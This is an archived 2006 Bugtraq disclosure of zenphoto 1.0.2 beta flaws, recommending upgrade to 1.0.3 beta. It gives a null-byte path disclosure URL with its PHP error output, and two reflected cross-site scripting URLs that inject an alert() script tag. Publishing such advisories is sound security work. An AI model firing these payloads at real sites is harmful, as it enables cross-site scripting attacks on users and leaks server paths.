| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
| Open Source and information security mailing list archives | ||
| 
 | 
Message-ID: <20061011223242.31569.qmail@securityfocus.com>
Date: 11 Oct 2006 22:32:42 -0000
From: raphael.huck@...e.fr
To: bugtraq@...urityfocus.com
Subject: zenphoto Multiple Path Disclosure and Cross Site Scripting
 Vulnerabilities
Vendor: zenphoto
Vulnerable: zenphoto 1.0.2 beta and below
The vendor has been warned and the vulnerabilities have been addressed in 1.0.3 beta.
Path Disclosure
---------------
http://www.example.com/photos/zen/i.php?a=EXISTING_ALBUM_NAME&i=EXISTING_IMAGE_NAME&s=thumb%00
which returns:
Warning: imagecreatetruecolor() [function.imagecreatetruecolor]: Invalid image dimensions in /path/photos/zen/i.php on line 85...
Cross Site Scripting
--------------------
http://www.example.com/photos/index.php?album=EXISTING_ALBUM_NAME%00%3Cscript%3Ealert('XSS%20Vulnerable')%3B%3C/script%3E
http://www.example.com/photos/index.php?album=EXISTING_ALBUM_NAMEℑ=EXISTING_IMAGE_NAME%00%3Cscript%3Ealert('XSS%20Vulnerable')%3B%3C/script%3Eaaaa
Solution
--------
Update to 1.0.3 beta
Original advisory
-----------------
http://zone14.free.fr/advisories/4/
--Raphael HUCK